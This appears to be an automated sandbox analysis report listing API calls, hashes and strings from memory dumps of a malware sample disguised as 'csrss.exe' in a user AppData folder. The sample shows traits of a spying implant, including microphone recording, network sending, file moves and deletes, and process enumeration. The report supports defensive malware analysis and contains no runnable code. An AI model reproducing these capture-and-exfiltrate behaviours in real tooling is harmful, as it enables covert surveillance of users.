                                                      • API String ID: 1107811701-1426351568
                                                      • Opcode ID: 044c4ce010009cf68da790a24e9fe1439f43709a553bb007c7662b5618e098ff
                                                      • Instruction ID: 65517d2e4508923d62fc65f277146e3678ff8dc32bd6a3eae7ac23e89b40f92b
                                                      • Opcode Fuzzy Hash: 044c4ce010009cf68da790a24e9fe1439f43709a553bb007c7662b5618e098ff
                                                      • Instruction Fuzzy Hash: 7F31AF32D403499BDF05EBA5DC55AFEB778AF14314F500258F006668E0EF741B9ACBA0
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f6141030356ba8714c6b1f11cc23338af6e40142d84ea453b99e83abbfbb078b
                                                      • Instruction ID: ca1f2397be56449a949a93a2a761bae250b09a895cf9c695bf3645b7fc56000f
                                                      • Opcode Fuzzy Hash: f6141030356ba8714c6b1f11cc23338af6e40142d84ea453b99e83abbfbb078b
                                                      • Instruction Fuzzy Hash: B51106B6A05318BFFB112F76CC0499B3AACEF85B74B004255F851DB580EE349841C3B0
                                                      APIs
                                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 33D41BF9
                                                      • waveInOpen.WINMM(33DB2AC0,000000FF,33DB2AA8,Function_00000D0B,00000000), ref: 33D41C8F
                                                      • waveInPrepareHeader.WINMM(33DB2A88,00000020), ref: 33D41CE3
                                                      • waveInAddBuffer.WINMM(33DB2A88,00000020), ref: 33D41CF2
                                                      • waveInStart.WINMM ref: 33D41CFE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                      • String ID: H#z
                                                      • API String ID: 1356121797-2410801705
                                                      • Opcode ID: 5a83c14032103741b973c20c9a45098b6998cc4acee9658ff95ffdda4a3866b8
                                                      • Instruction ID: a49917a1ed6a335fac84e443d5cba081a33d96c9207f06387090c6babb8b4563
                                                      • Opcode Fuzzy Hash: 5a83c14032103741b973c20c9a45098b6998cc4acee9658ff95ffdda4a3866b8
                                                      • Instruction Fuzzy Hash: AF21FA73914201DFDB29FF76CC1895A7BF9BF99650B04442AE106F7A90EB744403CBA9
                                                      APIs
                                                        • Part of subcall function 33D90C41: _free.LIBCMT ref: 33D90C6A
                                                      • _free.LIBCMT ref: 33D90F48
                                                        • Part of subcall function 33D86782: HeapFree.KERNEL32(00000000,00000000), ref: 33D86798
                                                        • Part of subcall function 33D86782: GetLastError.KERNEL32(?,?,33D90C6F,?,00000000,?,00000000,?,33D90F13,?,00000007,?,?,33D9145E,?,?), ref: 33D867AA
                                                      • _free.LIBCMT ref: 33D90F53
                                                      • _free.LIBCMT ref: 33D90F5E
                                                      • _free.LIBCMT ref: 33D90FB2
                                                      • _free.LIBCMT ref: 33D90FBD
                                                      • _free.LIBCMT ref: 33D90FC8
                                                      • _free.LIBCMT ref: 33D90FD3
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                      • Instruction ID: 377efe735c67457ba70ad0f71da40da92a5161fbc9c4a490521c46e2163b9b60
                                                      • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                      • Instruction Fuzzy Hash: 27116671D44708BAE720AF71EC46FCB779CEF00702F404815BAEDEA850D6B9B90457A0
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,33D7A351,33D792BE), ref: 33D7A368
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 33D7A376
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 33D7A38F
                                                      • SetLastError.KERNEL32(00000000,?,33D7A351,33D792BE), ref: 33D7A3E1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 94ff39a780bba4bc5d451e98b4e913200e48a5e3653d2eb97a8b6daa464257d8
                                                      • Instruction ID: 7823efb33abcc4a08619224c631c5d88b52f6378a7b809ba7081d3bce38d131b
                                                      • Opcode Fuzzy Hash: 94ff39a780bba4bc5d451e98b4e913200e48a5e3653d2eb97a8b6daa464257d8
                                                      • Instruction Fuzzy Hash: 9D01D437A1C3119EF2052EF99C8675B278CEF02AF6720032AF928646D0EFA358125250
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 33D5D476
                                                        • Part of subcall function 33D5D50F: RegisterClassExA.USER32(00000030), ref: 33D5D55B
                                                        • Part of subcall function 33D5D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 33D5D576
                                                        • Part of subcall function 33D5D50F: GetLastError.KERNEL32 ref: 33D5D580
                                                      • ExtractIconA.SHELL32(00000000,?,00000000), ref: 33D5D4AD
                                                      • lstrcpyn.KERNEL32(33DB4B60,33DACF34,00000080), ref: 33D5D4C7
                                                      • Shell_NotifyIcon.SHELL32(00000000,33DB4B48), ref: 33D5D4DD
                                                      • TranslateMessage.USER32(?), ref: 33D5D4E9
                                                      • DispatchMessageA.USER32(?), ref: 33D5D4F3
                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 33D5D500
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                      • String ID:
                                                      • API String ID: 1970332568-0
                                                      • Opcode ID: 2941c2a04ebbf8efcca7e0b67a35b08436a56ad3583da9a71f99206c5bfa2d13
                                                      • Instruction ID: df72be2e5e36fbc4600394aed9240cb0d177f2101c4d1da873a86acdc167a6ec
                                                      • Opcode Fuzzy Hash: 2941c2a04ebbf8efcca7e0b67a35b08436a56ad3583da9a71f99206c5bfa2d13
                                                      • Instruction Fuzzy Hash: D601DE72801249EBEB11EFA5C84DF9ABBFCEB95B05F004055F612A3184E7B5548A8B64
                                                      APIs
                                                      • __allrem.LIBCMT ref: 33D7AC69
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 33D7AC85
                                                      • __allrem.LIBCMT ref: 33D7AC9C
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 33D7ACBA
                                                      • __allrem.LIBCMT ref: 33D7ACD1
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 33D7ACEF
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 1992179935-0
                                                      • Opcode ID: e2b3cbaf62085b233323337bc68254ad5d621eee73a59ece424e332fdb7bae19
                                                      • Instruction ID: 69842f844b74d7909eadff4aa83ddbef0c3d4b8eda194528a2cace8402a6d3d2
                                                      • Opcode Fuzzy Hash: e2b3cbaf62085b233323337bc68254ad5d621eee73a59ece424e332fdb7bae19
                                                      • Instruction Fuzzy Hash: A48118B6A00706ABE7119F78CC41B5A73E9AF40760F24452AF550DBB80FB76E94087A0
                                                      APIs
                                                      • _free.LIBCMT ref: 33D838C9
                                                      • _free.LIBCMT ref: 33D838E3
                                                      • _free.LIBCMT ref: 33D838EE
                                                      • _free.LIBCMT ref: 33D839C2
                                                      • _free.LIBCMT ref: 33D839DE
                                                        • Part of subcall function 33D7BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 33D7BD1B
                                                        • Part of subcall function 33D7BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 33D7BD3D
                                                        • Part of subcall function 33D7BD19: TerminateProcess.KERNEL32(00000000), ref: 33D7BD44
                                                      • _free.LIBCMT ref: 33D839E8
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: _free$Process$CurrentFeaturePresentProcessorTerminate
                                                      • String ID:
                                                      • API String ID: 2329545287-0
                                                      • Opcode ID: dd4679e497a3ac440a36ccf5cad4bc4b97665c585b91728a2df2259eb48d0105
                                                      • Instruction ID: 8055a860b7d7a94ec3c8f0ae46a772a0b2fbc602d308788ad285e37c03dc48b9
                                                      • Opcode Fuzzy Hash: dd4679e497a3ac440a36ccf5cad4bc4b97665c585b91728a2df2259eb48d0105
                                                      • Instruction Fuzzy Hash: AF51A37ED043046BDB049F68D8816AA77B8EF41B64F14015DE94C9FD40EA717D02C3A0
                                                      APIs
                                                        • Part of subcall function 33D5179C: SetLastError.KERNEL32(0000000D,33D51D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,33D51CFA), ref: 33D517A2
                                                      • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,33D51CFA), ref: 33D51D37
                                                      • GetNativeSystemInfo.KERNEL32(?), ref: 33D51DA5
                                                      • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 33D51DC9
                                                        • Part of subcall function 33D51CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,33D51DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 33D51CB3
                                                      • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 33D51E10
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 33D51E17
                                                      • SetLastError.KERNEL32(0000045A), ref: 33D51F2A
                                                        • Part of subcall function 33D52077: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?), ref: 33D520E7
                                                        • Part of subcall function 33D52077: HeapFree.KERNEL32(00000000), ref: 33D520EE
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ErrorHeapLast$Process$AllocAllocateFreeInfoNativeSystemVirtual
                                                      • String ID:
                                                      • API String ID: 2227336758-0
                                                      • Opcode ID: 349a19ac5def50d07718335c36296b76de4bd6c91da35f7bdbe5a81e7d53d1d0
                                                      • Instruction ID: 1c149867a4de6bfb0722cca19556f0d941b85074e87a4b7ed4beb4659a730dc5
                                                      • Opcode Fuzzy Hash: 349a19ac5def50d07718335c36296b76de4bd6c91da35f7bdbe5a81e7d53d1d0
                                                      • Instruction Fuzzy Hash: FA610675A00311ABFF009F25C980B6A7BE9BF84780F444159F849CB682EBB4D455CBE1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: __cftoe
                                                      • String ID:
                                                      • API String ID: 4189289331-0
                                                      • Opcode ID: adbf829966ef719e97ce3742ba7531073df1b076b812e379b030c9dc8b59a015
                                                      • Instruction ID: 7681cd96a0aa21f403ace66e87f4fb020b3d36b1f0d3d60cc46194f34c04f131
                                                      • Opcode Fuzzy Hash: adbf829966ef719e97ce3742ba7531073df1b076b812e379b030c9dc8b59a015
                                                      • Instruction Fuzzy Hash: 92510ABAD00305ABEB009B69CCC0F9E77BEEF48771F58421AE8159E181DB31F90186B4
                                                      APIs
                                                      • SetEvent.KERNEL32(?,?), ref: 33D454BF
                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 33D4556F
                                                      • TranslateMessage.USER32(?), ref: 33D4557E
                                                      • DispatchMessageA.USER32(?), ref: 33D45589
                                                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,33DB4F78), ref: 33D45641
                                                      • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 33D45679
                                                        • Part of subcall function 33D44AA1: send.WS2_32(756F1AE8,00000000,00000000,00000000), ref: 33D44B36
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                      • String ID:
                                                      • API String ID: 2956720200-0
                                                      • Opcode ID: ffb6417a27506c6c3c9abdb28609299a02aaeb9cad5dd726c3daec9467b58b7e
                                                      • Instruction ID: 8215c82e9917f733fc5338af8673029706bb38df390d6aed4ec850643705ee46
                                                      • Opcode Fuzzy Hash: ffb6417a27506c6c3c9abdb28609299a02aaeb9cad5dd726c3daec9467b58b7e
                                                      • Instruction Fuzzy Hash: 88419137E043019BDB14FF75C89886F77FAAB85650F80092CF55297990EF34990AC7A2
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 33D479C5
                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 33D47A0D
                                                        • Part of subcall function 33D44AA1: send.WS2_32(756F1AE8,00000000,00000000,00000000), ref: 33D44B36
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D47A4D
                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 33D47A6A
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D47A95
                                                      • DeleteFileW.KERNEL32(00000000), ref: 33D47AA5
                                                        • Part of subcall function 33D44B96: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 33D44BA5
                                                        • Part of subcall function 33D44B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,33D4548B,33D454A0), ref: 33D44BC3
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                      • String ID:
                                                      • API String ID: 1303771098-0
                                                      • Opcode ID: 73e0214ce6bc0c18c122c623363e2571dafccac55028b39ebf1ffb20ab07411a
                                                      • Instruction ID: d5316179cd00d7c12c1a706d5ddfacb2d0ae09c33563c98d6fd9720f8d5e91cb
                                                      • Opcode Fuzzy Hash: 73e0214ce6bc0c18c122c623363e2571dafccac55028b39ebf1ffb20ab07411a
                                                      • Instruction Fuzzy Hash: AF318D72908341AFD310DF20CC8599FB7E8FF94655F404A1DB58AA2581EF70EA49CBA6
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
                                                      • _free.LIBCMT ref: 33D8824C
                                                      • _free.LIBCMT ref: 33D88274
                                                      • SetLastError.KERNEL32(00000000), ref: 33D88281
                                                      • SetLastError.KERNEL32(00000000), ref: 33D8828D
                                                      • _abort.LIBCMT ref: 33D88293
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free$_abort
                                                      • String ID:
                                                      • API String ID: 3160817290-0
                                                      • Opcode ID: 38d99ba489e1473a37f7a32bca3c4c23ad6f54500237d3a24fe0f3f111127f51
                                                      • Instruction ID: aa16cebea19ec24c4971774fd18022e2d65a5c849dbf5942a943cb845714149d
                                                      • Opcode Fuzzy Hash: 38d99ba489e1473a37f7a32bca3c4c23ad6f54500237d3a24fe0f3f111127f51
                                                      • Instruction Fuzzy Hash: 9CF0A93A904B006AE6413336DC45B5F26699BC2BB7F290614F965AE580EF30A90642B4
                                                      APIs
                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 33D5A077
                                                      • GetLocalTime.KERNEL32(?), ref: 33D5A105
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectoryLocalTime
                                                      • String ID: H#z$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                      • API String ID: 467499730-3269061970
                                                      • Opcode ID: a5ed3d60d45a8eb51d5a614e625c0fe5903c70e25adf6d9d34c5685ec473d298
                                                      • Instruction ID: 5e7b8b4863ac442b01fe3de2792c8aadc03f6fb98db16a46311f3aa9706eebdf
                                                      • Opcode Fuzzy Hash: a5ed3d60d45a8eb51d5a614e625c0fe5903c70e25adf6d9d34c5685ec473d298
                                                      • Instruction Fuzzy Hash: 17519372E403199BEF14EBB5CC509EDBBB9AF54210F440019F546ABA81EF349E4AC7B0
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\csrss.exe,00000104), ref: 33D83475
                                                      • _free.LIBCMT ref: 33D83540
                                                      • _free.LIBCMT ref: 33D8354A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: 0/l$C:\Users\user\AppData\Roaming\csrss.exe
                                                      • API String ID: 2506810119-2265870100
                                                      • Opcode ID: 6713ff70dad2a37d81d508ac993bea0382a1c1aa824161075136d70829ff82b8
                                                      • Instruction ID: 4b5ced937d96aac254d6475f1584350c41d06f68edfa163783a317f9b84ef08c
                                                      • Opcode Fuzzy Hash: 6713ff70dad2a37d81d508ac993bea0382a1c1aa824161075136d70829ff82b8
                                                      • Instruction Fuzzy Hash: 6C3156BAD01358EFD722DF9DD88499EBBFCEB45710B144096E54CABA10D670AA41C7A0
                                                      APIs
                                                      • RegisterClassExA.USER32(00000030), ref: 33D5D55B
                                                      • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 33D5D576
                                                      • GetLastError.KERNEL32 ref: 33D5D580
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ClassCreateErrorLastRegisterWindow
                                                      • String ID: 0$MsgWindowClass
                                                      • API String ID: 2877667751-2410386613
                                                      • Opcode ID: fa63d0a362ba745dcb6a02ee7b4b989d746c51501f7523b4ed8985c76cc2bf88
                                                      • Instruction ID: b9f27ee2be87b5f427b9d1ea83802a9b16a91480c2b6745bb55a5473ea7f18ce
                                                      • Opcode Fuzzy Hash: fa63d0a362ba745dcb6a02ee7b4b989d746c51501f7523b4ed8985c76cc2bf88
                                                      • Instruction Fuzzy Hash: 8301E9B1D00219ABEB01DFE9DC849EFBBBCEB05294F90052AF911A6240E7715A058BB1
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,33D832EB,00000003,?,33D8328B,00000003,33DAE948,0000000C,33D833E2,00000003,00000002), ref: 33D8335A
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,33D832EB,00000003,?,33D8328B,00000003,33DAE948,0000000C,33D833E2,00000003,00000002), ref: 33D8336D
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,33D832EB,00000003,?,33D8328B,00000003,33DAE948,0000000C,33D833E2,00000003,00000002,00000000), ref: 33D83390
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: a889995add13d43095b4eb8bd7ad9d8ca49c880bc30e8f8e3049e2359058a579
                                                      • Instruction ID: a733b2ee62fb036f6fd86b4ac46c8a2447d97d65636277729f999c707049b205
                                                      • Opcode Fuzzy Hash: a889995add13d43095b4eb8bd7ad9d8ca49c880bc30e8f8e3049e2359058a579
                                                      • Instruction Fuzzy Hash: 98F04475E01109FFDB01AFA1C848BADBFF4EF04752F444199F80AA6140DB755A55CB90
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8c8c0af38b1df915e3f80435b6b8091e5512f40afa11ef5ad370dd932cd766b6
                                                      • Instruction ID: 8bb5f9aac033f997b1f0f35ec995caf97f010d989344cff25fa79607bad67bb8
                                                      • Opcode Fuzzy Hash: 8c8c0af38b1df915e3f80435b6b8091e5512f40afa11ef5ad370dd932cd766b6
                                                      • Instruction Fuzzy Hash: 34711A79D01316DBDB11CF59C844AEFBBB9FF45790F580265E4526F280CB70A949C7A0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: _free$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 3033488037-0
                                                      • Opcode ID: b035e29c698064aea1d02f8717cd098ee9382823afb74972a486ea5331b185d1
                                                      • Instruction ID: fd48b293e4fc81def7b53df9112013181a99d3adc4e982c621fc0c52ab0cf75b
                                                      • Opcode Fuzzy Hash: b035e29c698064aea1d02f8717cd098ee9382823afb74972a486ea5331b185d1
                                                      • Instruction Fuzzy Hash: C6510476A00308AFE711CF69CC40A6AB3F9EF44B25F444659E859DF650E731FA41CB90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: b56fd5466eaad276a3838a21bbdcbc34b452fc4c98d03334bc423ca23bafdd5d
                                                      • Instruction ID: e2294fb51e73d7112a5b28547b8eb84a1b7b40d882866ec19c0f3b6d798d8c28
                                                      • Opcode Fuzzy Hash: b56fd5466eaad276a3838a21bbdcbc34b452fc4c98d03334bc423ca23bafdd5d
                                                      • Instruction Fuzzy Hash: 5E41C17AE003049FDB15DF78C881A5EB3F5EF88B24F1542A9D559EF640DA31B901CB90
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32 ref: 33D8F363
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 33D8F386
                                                        • Part of subcall function 33D86137: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 33D86169
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 33D8F3AC
                                                      • _free.LIBCMT ref: 33D8F3BF
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 33D8F3CE
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                      • String ID:
                                                      • API String ID: 336800556-0
                                                      • Opcode ID: 4d86a1393cfbf8e5baa95ca7699d4e56be7b7a0e44cb1509af7d154cae7d66c7
                                                      • Instruction ID: 2c5d25e87ae083f4430af60eb8d67944e88ff2fbcd2c0b5c22f56281f175967e
                                                      • Opcode Fuzzy Hash: 4d86a1393cfbf8e5baa95ca7699d4e56be7b7a0e44cb1509af7d154cae7d66c7
                                                      • Instruction Fuzzy Hash: 080184B7E017157F27111ABAAC8CC7F6AADDAC6EA57550329FD04DE240DE71AD0281B0
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,33D805E2,33D861B8,?,?,33D6F8A7,?,00000008,33D6F9A6,00000001,?,?,?), ref: 33D8829E
                                                      • _free.LIBCMT ref: 33D882D3
                                                      • _free.LIBCMT ref: 33D882FA
                                                      • SetLastError.KERNEL32(00000000,?,?,?), ref: 33D88307
                                                      • SetLastError.KERNEL32(00000000,?,?,?), ref: 33D88310
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: dbd5616bf8d3394f6b8f20eedca9974032b5a655e1c22cf5893d60dd09453329
                                                      • Instruction ID: 1af8021ceb75fd2f4f3e56855e3995a18d1a04884bfe437b8b7c081d6d25b149
                                                      • Opcode Fuzzy Hash: dbd5616bf8d3394f6b8f20eedca9974032b5a655e1c22cf5893d60dd09453329
                                                      • Instruction Fuzzy Hash: 5B01C83FD05B406BE3026636DC84E4B266EEFC26B77250529F869EE581FF70A90641B4
                                                      APIs
                                                      • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 33D5C1F5
                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 33D5C208
                                                      • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 33D5C228
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D5C233
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D5C23B
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseHandleOpen$FileImageName
                                                      • String ID:
                                                      • API String ID: 2951400881-0
                                                      • Opcode ID: 22ec7c31b4e2f1e4a5e25e63c2f283676f063f4d0df472a788240227ffcd34e9
                                                      • Instruction ID: ea1cf3c57869fbefa3e30e1b63be120e800781ec3d2a7d1f213f8b16e5394d9c
                                                      • Opcode Fuzzy Hash: 22ec7c31b4e2f1e4a5e25e63c2f283676f063f4d0df472a788240227ffcd34e9
                                                      • Instruction Fuzzy Hash: AC01F9B6640315ABFA01A7E8CC49F67B3BCDB84AD5F000156FA59E3191EFB04E468671
                                                      APIs
                                                      • _free.LIBCMT ref: 33D909D4
